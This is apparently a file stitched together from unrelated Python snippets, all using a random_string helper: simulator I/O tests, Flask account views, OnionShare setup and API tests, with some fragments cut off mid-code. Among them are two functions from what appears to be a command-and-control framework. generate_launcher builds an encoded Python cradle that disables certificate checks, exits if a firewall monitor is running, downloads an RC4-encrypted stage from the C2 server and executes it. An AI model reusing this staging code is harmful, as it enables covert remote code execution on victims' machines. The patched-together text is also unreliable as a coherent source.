def test_solvr(write_read): parameters_ref = { "solver": { "method": numpy.random.randint(10), "z_precond": helpers.random_string(2), "o_precond": helpers.random_string(2), "rel_iter_max": numpy.random.rand(), "eps": numpy.random.rand(), }, } parameters = write_read(parameters_ref) assert parameters_ref["solver"]["method"] == parameters["solver"]["method"] assert parameters_ref["solver"]["z_precond"] == parameters["solver"][ "z_precond"] assert parameters_ref["solver"]["o_precond"] == parameters["solver"][ "o_precond"] assert numpy.allclose( parameters_ref["solver"]["rel_iter_max"], parameters["solver"]["rel_iter_max"], atol=1.0e-5, ) assert numpy.allclose(parameters_ref["solver"]["eps"], parameters["solver"]["eps"], atol=1.0e-5)
def generate_stager_hop(self, server, key, profile, encrypt=True, encode=True): """ Generate the Python stager for hop.php redirectors that will perform key negotiation with the server and kick off the agent. """ # read in the stager base f = open(self.installPath + "./data/agent/stager_hop.py") stager = f.read() f.close() stager = helpers.strip_python_comments(stager) # first line of randomized text to change up the ending RC4 string randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string()) stager = randomHeader + stager # patch the server and key information stager = stager.replace("REPLACE_SERVER", server) stager = stager.replace("REPLACE_STAGING_KEY", key) stager = stager.replace("REPLACE_PROFILE", profile) stager = stager.replace("index.jsp", self.stage1) stager = stager.replace("index.php", self.stage2) # # base64 encode the stager and return it # if encode: # return "" if encrypt: # return an encrypted version of the stager ("normal" staging) # return encryption.xor_encrypt(stager, key) return encryption.rc4(key, stager) else: # otherwise return the case-randomized stager return stager
def test_title(write_read, single): parameters_ref = { "title": (helpers.random_string(80) if single else [ helpers.random_string(80) for _ in range(numpy.random.randint(5) + 2) ]), } parameters = write_read(parameters_ref) assert parameters_ref["title"] == parameters["title"]
def __init__(self): def exit(): os.killpg(os.getpgid(jshell_process.pid), signal.SIGTERM) os.killpg(os.getpgid(dummy_input_process.pid), signal.SIGTERM) for f in [in_path, out_path, snippet_path]: try: os.remove(f) pass except FileNotFoundError: pass atexit.register(exit) mkdir("snippets") mkdir("fifos") self.EOF_key = random_string(32) self.snippet_key = random_string(32) self.fifo_key = random_string(32) snippet_path = "snippets/" + self.snippet_key in_path = "fifos/in_" + self.fifo_key out_path = "fifos/out_" + self.fifo_key for path in [in_path, out_path]: try: os.mkfifo(path) except FileExistsError: pass dummy_input_process = subprocess.Popen( f"(while true; do sleep 86400; done) > {in_path}", shell=True, preexec_fn=os.setsid) jshell_process = subprocess.Popen( f"jshell < {in_path} | tee -a fifos/log_{self.EOF_key}", shell=True, preexec_fn=os.setsid, universal_newlines=True, stdout=subprocess.PIPE) # This is needed so that exit() can refer to both # processes without using self.{process}. # This way, garbage collection of this jshell # instances works properly. self.dummy_input_process = dummy_input_process self.jshell_process = jshell_process self.in_path = in_path self.out_path = out_path self.snippet_path = snippet_path self.jshell_process.stdout.read(89)
def test_flac(write_read): parameters_ref = { "flac": { "creep": bool(numpy.random.randint(2)), "porosity_model": numpy.random.randint(10), "version": numpy.random.randint(10), }, "rocks": { helpers.random_string(5): { "permeability_model": { "id": numpy.random.randint(10), "parameters": numpy.random.rand(numpy.random.randint(7) + 1), }, "equivalent_pore_pressure": { "id": numpy.random.randint(10), "parameters": numpy.random.rand(numpy.random.randint(7) + 1), }, } for _ in numpy.random.rand(10) + 1 }, } parameters = write_read(parameters_ref) helpers.allclose_dict(parameters_ref["flac"], parameters["flac"]) for k, v in parameters_ref["rocks"].items(): for kk, vv in v.items(): helpers.allclose_dict(vv, parameters["rocks"][k][kk], atol=1.0e-4)
def update_account(): form = AccountDataForm() user = g.user if request.method == 'GET': form.email.data = user.email form.language.data = user.language form.timezone.data = user.timezone elif request.method == 'POST' and form.validate_on_submit(): if password_hash(form.old_password.data) != user.password: form.old_password.errors.append(_('Wrong password')) return render_template('update_account.html', form=form) if form.email.data != user.email: user.email = form.email.data user.confirmed = False user.confirmation_string = random_string(20) msg = message_confirmation(user.id, user.email, user.confirmation_string) mail.send(msg) flash(_('Confirmation message sent, check your e-mail')) if form.password.data: user.password = password_hash(form.password.data) flash(_('Password successfully changed')) user.language = form.language.data user.timezone = form.timezone.data db.session.commit() return redirect('update_account') return render_template('update_account.html', form=form)
def brief_title(request): title = random_string() def fin(): delete_brief(title) request.addfinalizer(fin) return title
def test_oft(write_read, oft, n): parameters_ref = { oft: [ helpers.random_string(n) for _ in range(numpy.random.randint(10) + 1) ] } parameters = write_read(parameters_ref) assert parameters_ref[oft] == parameters[oft]
def test_dataset_update_bad(dataset_for_tests): """Confirm that bad requests will be rejected.""" indata = {"dataset": {"title": "Updated title"}} ds_uuid = helpers.random_string() responses = helpers.make_request_all_roles(f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata) for response in responses: if response.role in ("edit", "data", "root"): assert response.code == 404 elif response.role == "no-login": assert response.code == 401 else: assert response.code == 403 assert not response.data ds_uuid = uuid.uuid4().hex responses = helpers.make_request_all_roles(f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata) for response in responses: if response.role in ("edit", "data", "root"): assert response.code == 404 elif response.role == "no-login": assert response.code == 401 else: assert response.code == 403 assert not response.data ds_uuid = dataset_for_tests session = requests.Session() helpers.as_user(session, helpers.USERS["data"]) indata = {"title": ""} response = helpers.make_request(session, f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata) assert response.code == 400 assert not response.data indata = {"dataset": {"extra": "asd"}} response = helpers.make_request(session, f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata) assert response.code == 400 assert not response.data indata = {"dataset": {"timestamp": "asd"}} response = helpers.make_request(session, f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata) assert response.code == 400 assert not response.data
def test_incon(anisotropic): # Create 3D mesh dx = numpy.arange(3) + 1 dy = numpy.arange(4) + 1 dz = numpy.arange(5) + 1 mesh = toughio.meshmaker.structured_grid(dx, dy, dz, material=helpers.random_string(5)) initial_condition = numpy.random.rand(mesh.n_cells, 4) mesh.add_cell_data("initial_condition", initial_condition) porosity = numpy.random.rand(mesh.n_cells) mesh.add_cell_data("porosity", porosity) if anisotropic is not None: permeability = (numpy.random.rand(mesh.n_cells, 3) if anisotropic else numpy.random.rand(mesh.n_cells)) mesh.add_cell_data("permeability", permeability) parameters = helpers.write_read( filename="INCON", obj=None, writer=mesh.write_incon, reader=toughio.read_mesh, reader_kws={"file_format": "tough"}, ) # Check block INCON assert sorted(mesh.labels) == sorted( parameters["initial_conditions"].keys()) values = [ parameters["initial_conditions"][label]["values"] for label in mesh.labels ] assert numpy.allclose(mesh.cell_data["initial_condition"], values) porosity = [ parameters["initial_conditions"][label]["porosity"] for label in mesh.labels ] assert numpy.allclose(mesh.cell_data["porosity"], porosity) if anisotropic is not None: userx = numpy.array([ parameters["initial_conditions"][label]["userx"] for label in mesh.labels ]) permeability = userx[:, :3] if anisotropic else userx[:, 0] assert numpy.allclose(mesh.cell_data["permeability"], permeability, atol=1.0e-4)
def start_hidden_service(self, gui=False, tails_root=False): if not self.port: self.choose_port() if helpers.get_platform() == 'Tails' and not tails_root: # in Tails, start the hidden service in a root process if gui: args = ['/usr/bin/gksudo', '-D', 'OnionShare', '--', '/usr/bin/onionshare'] else: args = ['/usr/bin/sudo', '--', '/usr/bin/onionshare'] p = subprocess.Popen(args+[str(self.port)], stderr=subprocess.PIPE, stdout=subprocess.PIPE) stdout = p.stdout.read(22) # .onion URLs are 22 chars long if stdout: self.onion_host = stdout else: if p.poll() == -1: raise TailsError(o.stderr.read()) else: raise TailsError(strings._("error_tails_unknown_root")) else: if self.local_only: self.onion_host = '127.0.0.1:{0}'.format(self.port) else: # come up with a hidden service directory name hidserv_dir = '{0}/onionshare_{1}'.format(helpers.get_tmp_dir(), helpers.random_string(8)) self.cleanup_filenames.append(hidserv_dir) # connect to the tor controlport controller = False tor_control_ports = [9051, 9151] for tor_control_port in tor_control_ports: try: controller = Controller.from_port(port=tor_control_port) break except SocketError: pass if not controller: raise NoTor(strings._("cant_connect_ctrlport").format(tor_control_ports)) controller.authenticate() # set up hidden service controller.set_options([ ('HiddenServiceDir', hidserv_dir), ('HiddenServicePort', '80 127.0.0.1:{0}'.format(self.port)) ]) # figure out the .onion hostname hostname_file = '{0}/hostname'.format(hidserv_dir) self.onion_host = open(hostname_file, 'r').read().strip()
def test_outpu(write_read, fmt): parameters_ref = { "output": { "format": fmt, "variables": { helpers.random_string(20): None, helpers.random_string(20): numpy.random.randint(10), helpers.random_string(20): numpy.random.randint(10, size=1), helpers.random_string(20): numpy.random.randint(10, size=2), helpers.random_string(20): numpy.random.randint(10, size=(numpy.random.randint(1, 10), 2)), }, }, } parameters = write_read(parameters_ref) helpers.allclose_dict(parameters_ref["output"]["variables"], parameters["output"]["variables"])
def dao_generate_bikes(self, number): db = firestore.Client() tran = db.transaction() for i in range(0, number): db.collection('bikes').document().set( { "title": random_string(10), "price": random.randint(100, 2000), "stars": random.choice([1, 2, 3, 4, 5]), "createdOn": datetime.now(tz=None) }, merge=True) db.collection('bikes').document("metainfo").set( {"total": Increment(1)}, merge=True) tran.commit()
async def login_task(request): redis = request.app['redis'] user_ip, _ = request.transport.get_extra_info('peername') token = random_string() bits = await complexity.get(redis, user_ip) task = hashcash.new(bits=bits) await redis.set(token, json.dumps(task)) await redis.expire(token, X_POFFW_EXPIRE) return web.json_response(data=task, headers={ X_POFFW_HEADER: token, })
def upload_photo(): try: file = request.files["user_file"] except KeyError: flash("No file sent.") return redirect(request.url) extension = os.path.splitext(file.filename)[1] if not allowed_file(file.filename): flash("The extension of this file (%s) is not allowed." % extension) return redirect("/") if not file.filename: flash("Please select a file.") return redirect("/") file.filename = random_string(16) + extension file.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename)) file_path = os.path.join(app.config['UPLOAD_FOLDER'] + "/" + file.filename) bytessize, width, height, exif = get_image_properties(file_path) datetime_original = exif.get('DateTimeOriginal', None) if datetime_original: datetime_original = datetime.datetime.strptime( datetime_original, '%Y:%m:%d %H:%M:%S' ) datetime_original = datetime_original.strftime("%Y-%m-%d %H:%M:%S") else: flash("This photo is not dated. We assumed is today.") user_id = flask_login.current_user.get_id() url = upload_file_to_s3(file_path, 'users/%s/%s' % (user_id, file.filename), file.content_type, app.config["S3_BUCKET"]) now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") cur = get_db().execute(""" insert into photos (object, dt_uploaded, dt,original_name, bytessize, width, height, user_id) values (?,?,?,?,?,?,?,?)""", (url, now, datetime_original or now, file.filename, bytessize, width, height, flask_login.current_user.get_id(),)) g._database.commit() cur.close() os.remove(file_path) return redirect("/")
def test_delete_bad(): """Confirm that bad identifiers return 404.""" session = requests.Session() helpers.as_user(session, helpers.USERS["data"]) for _ in range(3): ds_uuid = helpers.random_string() response = helpers.make_request(session, f"/api/v1/dataset/{ds_uuid}", method="DELETE") assert response.code == 404 assert not response.data ds_uuid = uuid.uuid4() response = helpers.make_request(session, f"/api/v1/dataset/{ds_uuid}", method="DELETE") assert response.code == 404 assert not response.data
def test_indom(write_read, num_pvars, num_items): num_items = num_items if num_items else numpy.random.randint(10) + 1 parameters_ref = { "rocks": { helpers.random_string(5): { "initial_condition": numpy.random.rand(num_pvars), } for _ in range(num_items) }, } parameters = write_read(parameters_ref) for k, v in parameters_ref["rocks"].items(): assert numpy.allclose( v["initial_condition"], parameters["rocks"][k]["initial_condition"], atol=1.0e-4, )
def get(self): fbcookie = facebook.get_user_from_cookie(self.request.cookies) if not fbcookie: self.redirect('/') return user = User.is_logged(self) graph = facebook.GraphAPI(fbcookie["access_token"]) profile = graph.get_object("me") if not user: password = helpers.random_string(8) user = User(nickname = profile['username'].lower(), password = User.slow_hash(password)); user.fb_access_token = fbcookie["access_token"] try: user.about = profile['bio'] except: pass try: user.location = profile['location']['name'] except: pass try: user.firstname = profile['first_name'] except: pass try: user.lastname = profile['last_name'] except: pass try: user.fb_profile_url = profile['link'] except: pass try: user.fb_ui = profile['id'] except: pass user.put() session = get_current_session() session.regenerate_id() session['user'] = user self.redirect('/') else: if str(user.fb_ui) == str(profile['id']): self.redirect('/') else: #TODO #USUARIO CAMBIO DE ID?? o ESTA VINCULANDO A CUENTA EXISTENTE pass
def test_eleme(write_read, label_length, coord): labels = [ helpers.random_label(label_length) for _ in range(numpy.random.randint(10) + 1) ] keys = [ "nseq", "nadd", "material", "volume", "heat_exchange_area", "permeability_modifier", "center", ] parameters_ref = { "elements": { label: { key: (numpy.random.randint(10) if key in {"nseq", "nadd"} else helpers.random_string(5) if key == "material" else numpy. random.rand(3) if key == "center" else numpy.random.rand()) for key in keys } for label in labels }, "coordinates": coord, } parameters = write_read(parameters_ref) assert sorted(parameters_ref["elements"].keys()) == sorted( parameters["elements"].keys()) for k, v in parameters_ref["elements"].items(): for kk, vv in v.items(): if not isinstance(vv, str): assert numpy.allclose(vv, parameters["elements"][k][kk], atol=1.0e-4) else: assert vv == parameters["elements"][k][kk] assert parameters_ref["coordinates"] == parameters["coordinates"]
def test_save2incon(reset): this_dir = os.path.dirname(os.path.abspath(__file__)) filename = os.path.join(this_dir, "support_files", "outputs", "SAVE.out") save = toughio.read_output(filename) output_filename = helpers.tempdir(helpers.random_string(10)) argv = [ filename, output_filename, ] if reset: argv += ["-r"] toughio._cli.save2incon(argv) incon = toughio.read_output(output_filename) assert save.labels.tolist() == incon.labels.tolist() helpers.allclose_dict(save.data, incon.data)
def account_problem(): form = AccountProblemForm() if form.validate_on_submit(): user = User.query.filter_by(email=form.email.data).first() if user is None: form.email.errors.append(_('Unknown e-mail address')) elif form.problem.data == 'confirmation': msg = message_confirmation(user.id, user.email, user.confirmation_string) mail.send(msg) flash(_('Confirmation message sent, check your e-mail')) return redirect('') elif form.problem.data == 'password': new_password = random_string(10) user.password = password_hash(new_password) db.session.commit() msg = message_reset_password(user.email, new_password) mail.send(msg) flash(_('Your password was reset, check your e-mail')) return redirect('') return render_template('account_problem.html', form=form)
def test_get_entry(mdb): """ Confirm that entries are returned if they exist. Checks: * Existing collections * Existing datasets * Existing orders * Existing users * Bad uuids * Bad non-uuid identifiers """ for dbcollection in ("collections", "datasets", "orders", "users"): entries = mdb[dbcollection].aggregate([{"$sample": {"size": 2}}]) for entry in entries: res = utils.get_entry(mdb, dbcollection, str(entry["_id"])) assert res["_id"] == entry["_id"] for _ in range(3): assert not utils.get_entry(mdb, "collections", str(uuid.uuid4())) assert not utils.get_entry(mdb, "collections", helpers.random_string())
def sign_up(): form = SignUpForm() if form.validate_on_submit(): user = User() user.email = form.email.data user.password = password_hash(form.password.data) user.signed_up = datetime.datetime.utcnow() user.language = form.language.data user.timezone = form.timezone.data user.confirmation_string = random_string(20) db.session.add(user) try: db.session.commit() except IntegrityError as err: if err.message.find(user.email) != -1: form.email.errors.append(_('E-mail address is in use')) else: msg = message_confirmation(user.id, user.email, user.confirmation_string) mail.send(msg) flash(_('Successful sign up, check your e-mail')) return redirect('') return render_template('sign_up.html', form=form)
def keys(self): return [random_string(length=10) for i in xrange(10)]
def generate_launcher(self, listenerName, encode=True, userAgent="default", littlesnitch='True'): """ Generate the initial Python 'download cradle' with a specified c2 server and a valid HTTP checksum. listenerName -> a name of a validly registered listener userAgent -> "default" uses the UA from the default profile in the database "none" sets no user agent any other text is used as the user-agent """ # if we don't have a valid listener, return nothing if not self.mainMenu.listeners.is_listener_valid(listenerName): print helpers.color("[!] Invalid listener: " + listenerName) return "" # extract the staging information from this specified listener (server, stagingKey, pivotServer, hop) = self.mainMenu.listeners.get_stager_config(listenerName) # if UA is 'default', use the UA from the default profile in the database if userAgent.lower() == "default": userAgent = self.userAgent # get the launching stage0 URI stage0uri = self.generate_launcher_uri(server, encode, pivotServer, hop) # adopted from MSF's python meterpreter staging # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/python/reverse_http.rb # first line of randomized text to change up the ending RC4 string launcherBase = "%s='%s'\n" % (helpers.random_string(), helpers.random_string()) if "https" in stage0uri: # monkey patch ssl woohooo launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n" launcherBase += "import sys, urllib2;" try: if littlesnitch.lower() == 'true': launcherBase += "import re, subprocess;" launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n" launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n" launcherBase += "out = ps.stdout.read()\n" launcherBase += "ps.stdout.close()\n" launcherBase += "if re.search(\"Little Snitch\", out):\n" launcherBase += " sys.exit()\n" except Exception as e: p = "[!] Error setting LittleSnitch in stagger: " + str(e) print helpers.color(p, color="Yellow") launcherBase += "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();" launcherBase += "UA='%s';" % (userAgent) launcherBase += "o.addheaders=[('User-Agent',UA)];" launcherBase += "a=o.open('%s').read();" % (stage0uri) launcherBase += "key='%s';" % (stagingKey) # RC4 decryption launcherBase += "S,j,out=range(256),0,[]\n" launcherBase += "for i in range(256):\n" launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += "i=j=0\n" launcherBase += "for char in a:\n" launcherBase += " i=(i+1)%256\n" launcherBase += " j=(j+S[i])%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n" launcherBase += "exec(''.join(out))" # base64 encode the stager and return it if encode: launchEncoded = base64.b64encode(launcherBase) # launcher = "python -c \"import sys,base64;exec(base64.b64decode('%s'));\"" %(launchEncoded) launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % (launchEncoded) return launcher else: return launcherBase
def test_title_1_with_short_description(self): description = random_string(30) actionitem = ActionItem() actionitem.description = description assert actionitem.title() == description
def values(self): return [random_string(length=50, with_spaces=True) for i in xrange(10)]
def test_gener(write_read, specific_enthalpy, label_length): n_rnd = numpy.random.randint(100) + 1 parameters_ref = { "generators": { helpers.random_label(label_length): { "name": [ helpers.random_string(5), helpers.random_string(5), helpers.random_string(5), ], "nseq": numpy.random.randint(10, size=3), "nadd": numpy.random.randint(10, size=3), "nads": numpy.random.randint(10, size=3), "type": [ helpers.random_string(4), helpers.random_string(4), helpers.random_string(4), ], "times": [numpy.random.rand(10), None, numpy.random.rand(n_rnd)], "rates": [ numpy.random.rand(10), numpy.random.rand(), numpy.random.rand(n_rnd), ], "specific_enthalpy": [ numpy.random.rand(10), numpy.random.rand(), numpy.random.rand(n_rnd), ] if specific_enthalpy else None, "layer_thickness": numpy.random.rand(3), }, helpers.random_label(label_length): { "name": [helpers.random_string(5), helpers.random_string(5)], "nseq": numpy.random.randint(10, size=2), "nadd": numpy.random.randint(10, size=2), "nads": numpy.random.randint(10, size=2), "type": [helpers.random_string(4), helpers.random_string(4)], "rates": numpy.random.rand(2), }, helpers.random_label(label_length): { "nseq": numpy.random.randint(10), "nadd": numpy.random.randint(10), "nads": numpy.random.randint(10), "type": helpers.random_string(4), "rates": numpy.random.rand(), "layer_thickness": numpy.random.rand(), }, }, } parameters = write_read(parameters_ref) assert sorted(parameters_ref["generators"].keys()) == sorted( parameters["generators"].keys()) for k, v in parameters_ref["generators"].items(): for kk, vv in v.items(): if kk in {"name", "type"}: assert vv == parameters["generators"][k][kk] else: if kk == "specific_enthalpy" and not specific_enthalpy: continue if numpy.ndim(vv): for i, arr_ref in enumerate(vv): arr = parameters["generators"][k][kk][i] if arr_ref is not None: assert numpy.allclose(arr, arr_ref, atol=1.0e-4) else: assert arr is None else: assert numpy.allclose(vv, parameters["generators"][k][kk], atol=1.0e-4)
def test_rocks(write_read): keys = [ "density", "porosity", "permeability", "conductivity", "specific_heat", "compressibility", "expansivity", "conductivity_dry", "tortuosity", "klinkenberg_parameter", "distribution_coefficient_3", "distribution_coefficient_4", ] parameters_ref = { "rocks": { helpers.random_string(5): {key: numpy.random.rand() for key in keys[:5]}, helpers.random_string(5): { key: numpy.random.rand() if key != "permeability" else numpy.random.rand(3) for key in keys[:5] }, helpers.random_string(5): {key: numpy.random.rand() for key in keys}, helpers.random_string(5): {key: numpy.random.rand() for key in keys}, helpers.random_string(5): {key: numpy.random.rand() for key in keys}, helpers.random_string(5): {key: numpy.random.rand() for key in keys}, } } names = list(parameters_ref["rocks"].keys()) parameters_ref["rocks"][names[-1]].update({ "relative_permeability": { "id": numpy.random.randint(10), "parameters": numpy.random.rand(numpy.random.randint(7) + 1), }, }) parameters_ref["rocks"][names[-2]].update({ "capillarity": { "id": numpy.random.randint(10), "parameters": numpy.random.rand(numpy.random.randint(7) + 1), }, }) parameters_ref["rocks"][names[-3]].update({ "relative_permeability": { "id": numpy.random.randint(10), "parameters": numpy.random.rand(numpy.random.randint(7) + 1), }, "capillarity": { "id": numpy.random.randint(10), "parameters": numpy.random.rand(numpy.random.randint(7) + 1), }, }) parameters = write_read(parameters_ref) assert sorted(parameters_ref["rocks"].keys()) == sorted( parameters["rocks"].keys()) for k, v in parameters_ref["rocks"].items(): for kk, vv in v.items(): if not isinstance(vv, dict): assert numpy.allclose(vv, parameters["rocks"][k][kk], atol=1.0e-5) else: helpers.allclose_dict(vv, parameters["rocks"][k][kk], atol=1.0e-4)
def __init__(self): self.snippet_key = random_string(32) self.restart()
except: seed = 0x1337 sections = conf.sections() # Creates the services for section in sections: if section.startswith('service-'): name = section[len('service-'):] services[name] = Service(name, Binary(name + "_0000"), 0) if len(services.values()) == num_services: break # Fill in the unspecified services for _ in range(len(services.values()), num_services): name = random_string(length=6).lower() services[name] = Service(name, Binary(name + "_0000"), 0) for section in sections: if section.startswith('team-'): name = section[len('team-'):] try: team_type = conf.get(section, 'type') except: team_type = 'default' try: type1_probability = conf.get(section, 'type1_probability') except: type1_probability = 1.0 try: type2_probability = conf.get(section, 'type2_probability')
def post(self): user = User.is_logged(self) if not user: self.redirect('/') key = self.request.get('edit') tags = [a.lower() for a in self.request.get_all('tags[]')] user = user ingredients = self.request.get_all('ingredients[]') directions = self.request.get_all('directions[]') tags = tags name = self.request.get('name') notes = self.request.get('notes') prep = self.request.get('prep_time') cook = self.request.get('cook_time') level = self.request.get('level') private = True if self.request.get('private') == "1" else False slug = helpers.sluglify( name ) thumb = None tinythumb = None slug_exists = Koch.all().filter('slug =', slug).fetch(1) if len ( slug_exists ) == 1: #alreadyexists slug = "%s-%s" % (slug, helpers.random_string()) if self.request.get('photo'): try: img_data = self.request.POST.get('photo').file.read() img = images.Image(img_data) img.im_feeling_lucky() png_data = img.execute_transforms(images.JPEG) img.resize(620,420) thumb = img.execute_transforms(images.JPEG) thmb = images.Image(img_data) thmb.im_feeling_lucky() png_data = thmb.execute_transforms(images.JPEG) thmb.resize(0, 80) tinythumb = thmb.execute_transforms(images.JPEG) except images.BadImageError: pass except images.NotImageError: pass except images.LargeImageError: pass if key: koch = Koch.get( key ) koch.title = name else: koch = Koch(slug=slug, title=name, author=user) koch.notes = notes koch.prep_time = prep koch.cook_time = cook koch.level = level koch.private = private koch.tags = tags koch.ingredients = ingredients koch.directions = directions if thumb is not None: koch.photo = thumb koch.thumb = tinythumb for tag in tags: Tag.up(tag) if key: user.recipes += 1 user.put() koch.put() self.redirect('/cook/%s' % (user.nickname))
# show them as snippets in our documentation. They are not necessary to be # included when creating your own custom code. # # Example of smart-tags: # __something: # some code here # :something__ import base64 import json import requests import os import helpers wallet_name = helpers.random_string() wallet_passphrase = helpers.random_string() wallet_server_url = os.getenv("WALLETSERVER_URL") if not helpers.check_url(wallet_server_url): print("Error: Invalid or missing WALLETSERVER_URL environment variable.") exit(1) # Help guide users against including api version suffix on url wallet_server_url = helpers.check_wallet_url(wallet_server_url) print(f"Creating a new wallet on {wallet_server_url}:") print(f"- name: {wallet_name}") print(f"- passphrase: {wallet_passphrase}") # __create_wallet:
from helpers import PytestRegex as regex from helpers import random_string INPUT_OUTPUT_DICT = {} # ---------------------------------- # Registration test INPUT = [['post', {'url': '/registration', 'data': {'username': random_string(), 'password': random_string()}, 'headers': None}]] EXPECTED_OUTPUT = [{'status': 'Success', 'message': 'Successfully authenticated.', 'auth_token': regex('.*'), 'refresh_token': regex('.*')}] INPUT_OUTPUT_DICT.update({'registration': [INPUT[:], EXPECTED_OUTPUT[:]]}) # ---------------------------------- # Login test INPUT = [['post', {'url': '/login', 'data': {'username': '******', 'password': '******'}, 'headers': None}]] INPUT_OUTPUT_DICT.update({'login': [INPUT[:], EXPECTED_OUTPUT[:]]}) # ----------------------------------
parameters_ref = { "n_phase": n_phase, "diffusion": numpy.random.rand(numpy.random.randint(5) + 1, n_phase), } parameters = write_read(parameters_ref) assert numpy.allclose(parameters_ref["diffusion"], parameters["diffusion"], atol=1.0e-4) @pytest.mark.parametrize( "write_read, fmt", [ (write_read_tough, None), (write_read_tough, helpers.random_string(20)), (write_read_json, None), (write_read_json, helpers.random_string(20)), ], ) def test_outpu(write_read, fmt): parameters_ref = { "output": { "format": fmt, "variables": { helpers.random_string(20): None, helpers.random_string(20): numpy.random.randint(10), helpers.random_string(20): numpy.random.randint(10, size=1),
REQUEST_LOAD = 0 REQUEST_DOWNLOAD = 1 REQUEST_PROGRESS = 2 REQUEST_OTHER = 3 REQUEST_CANCELED = 4 q = Queue.Queue() def add_request(type, path, data=None): global q q.put({'type': type, 'path': path, 'data': data}) slug = helpers.random_string(16) download_count = 0 stay_open = False def set_stay_open(new_stay_open): global stay_open stay_open = new_stay_open def get_stay_open(): return stay_open def debug_mode():
def start_hidden_service(self, gui=False, tails_root=False): if not self.port: self.choose_port() if helpers.get_platform() == 'Tails' and not tails_root: # in Tails, start the hidden service in a root process if gui: args = [ '/usr/bin/gksudo', '-D', 'OnionShare', '--', '/usr/bin/onionshare' ] else: args = ['/usr/bin/sudo', '--', '/usr/bin/onionshare'] p = subprocess.Popen(args + [str(self.port)], stderr=subprocess.PIPE, stdout=subprocess.PIPE) stdout = p.stdout.read(22) # .onion URLs are 22 chars long if stdout: self.onion_host = stdout else: if p.poll() == -1: raise TailsError(o.stderr.read()) else: raise TailsError(strings._("error_tails_unknown_root")) else: if self.local_only: self.onion_host = '127.0.0.1:{0}'.format(self.port) else: # come up with a hidden service directory name hidserv_dir = '{0}/onionshare_{1}'.format( helpers.get_tmp_dir(), helpers.random_string(8)) self.cleanup_filenames.append(hidserv_dir) # connect to the tor controlport controller = False tor_control_ports = [9051, 9151] for tor_control_port in tor_control_ports: try: controller = Controller.from_port( port=tor_control_port) break except SocketError: pass if not controller: raise NoTor( strings._("cant_connect_ctrlport").format( tor_control_ports)) controller.authenticate() # set up hidden service controller.set_options([ ('HiddenServiceDir', hidserv_dir), ('HiddenServicePort', '80 127.0.0.1:{0}'.format(self.port)) ]) # figure out the .onion hostname hostname_file = '{0}/hostname'.format(hidserv_dir) self.onion_host = open(hostname_file, 'r').read().strip()
def test_title_2_with_long_description_with_default(self): description = random_string(1000) actionitem = ActionItem() actionitem.description = description assert actionitem.title() == description[:140]
def test_mesh(nodal_distance, bound, coord): # Create 3D mesh dx = numpy.arange(3) + 1 dy = numpy.arange(4) + 1 dz = numpy.arange(5) + 1 mesh = toughio.meshmaker.structured_grid(dx, dy, dz, material=helpers.random_string(5)) idx = numpy.random.choice(mesh.n_cells, mesh.n_cells // 2, replace=False) mesh.cell_data["material"][idx] = 2 mesh.field_data[helpers.random_string(5)] = numpy.array([2, 3]) idx = numpy.random.choice(mesh.n_cells, mesh.n_cells // 2, replace=False) boundary_condition = (( numpy.random.rand(mesh.n_cells) < numpy.random.rand()).astype(int) if bound else numpy.zeros(mesh.n_cells)) mesh.add_cell_data("boundary_condition", boundary_condition) parameters = helpers.write_read( filename="MESH", obj=None, writer=mesh.write_tough, reader=toughio.read_mesh, writer_kws={ "nodal_distance": nodal_distance, "coord": coord }, reader_kws={"file_format": "tough"}, ) # Check block ELEME assert sorted(mesh.labels) == sorted(parameters["elements"].keys()) materials = [ parameters["elements"][label]["material"] for label in mesh.labels ] assert mesh.materials.tolist() == materials volumes = [ parameters["elements"][label]["volume"] for label, bcond in zip(mesh.labels, boundary_condition) if not bcond ] assert numpy.allclose(mesh.volumes[boundary_condition == 0], volumes) volumes = [ parameters["elements"][label]["volume"] for label, bcond in zip(mesh.labels, boundary_condition) if bcond ] assert numpy.allclose(mesh.volumes[boundary_condition == 1] * 1.0e50, volumes) centers = [ parameters["elements"][label]["center"] for label in mesh.labels ] assert numpy.allclose(mesh.centers, centers) # Check block COORD assert parameters["coordinates"] == coord # Check block CONNE nx, ny, nz = len(dx), len(dy), len(dz) lx, ly, lz = sum(dx), sum(dy), sum(dz) isot_x = [ v["permeability_direction"] == 1 for v in parameters["connections"].values() ] assert sum(isot_x) == (nx - 1) * ny * nz isot_y = [ v["permeability_direction"] == 2 for v in parameters["connections"].values() ] assert sum(isot_y) == nx * (ny - 1) * nz isot_z = [ v["permeability_direction"] == 3 for v in parameters["connections"].values() ] assert sum(isot_z) == nx * ny * (nz - 1) interface_areas = [ v["interface_area"] for v in parameters["connections"].values() ] assert (sum(interface_areas) == (nx - 1) * ly * lz + (ny - 1) * lx * lz + (nz - 1) * lx * ly) angles = [ v["gravity_cosine_angle"] == 0.0 for v in parameters["connections"].values() ] assert sum(angles) == sum(isot_x) + sum(isot_y) angles = [ v["gravity_cosine_angle"] == -1.0 for v in parameters["connections"].values() ] assert sum(angles) == sum(isot_z) if not bound: xmin, ymin, zmin = mesh.centers.min(axis=0) xmax, ymax, zmax = mesh.centers.max(axis=0) distances_ref = (ny * nz * (xmax - xmin) + nx * nz * (ymax - ymin) + nx * ny * (zmax - zmin)) distances = [ v["nodal_distances"] for v in parameters["connections"].values() ] assert numpy.allclose(distances_ref, numpy.sum(distances))
